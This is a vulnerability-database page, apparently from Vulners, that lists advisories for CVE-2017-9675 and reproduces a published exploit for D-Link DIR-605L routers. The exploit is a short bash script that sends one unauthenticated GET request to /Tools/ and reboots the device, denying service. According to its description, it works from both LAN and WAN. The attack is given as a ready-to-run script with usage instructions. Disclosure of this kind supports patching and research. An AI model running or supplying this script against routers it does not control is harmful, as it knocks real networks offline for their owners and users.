| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2017-9675 | 15 Jun 201719:29 | – | attackerkb | |
| CVE-2017-9675 | 14 Nov 201700:00 | – | circl | |
| D-Link DIR-605L Denial of Service Vulnerability | 19 Jun 201700:00 | – | cnvd | |
| CVE-2017-9675 | 15 Jun 201719:00 | – | cve | |
| CVE-2017-9675 | 15 Jun 201719:00 | – | cvelist | |
| D-Link DIR-605L < 2.08 - Denial of Service | 14 Nov 201700:00 | – | exploitdb | |
| D-Link DIR-605L 2.08 - Denial of Service | 14 Nov 201700:00 | – | exploitpack | |
| CVE-2017-9675 | 15 Jun 201719:29 | – | nvd | |
| D-Link DIR-605L < 2.08UIBetaB01 DoS Vulnerability | 17 Nov 201700:00 | – | openvas | |
| D-Link DIR605L 2.08 Denial Of Service | 16 Nov 201700:00 | – | packetstorm |
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation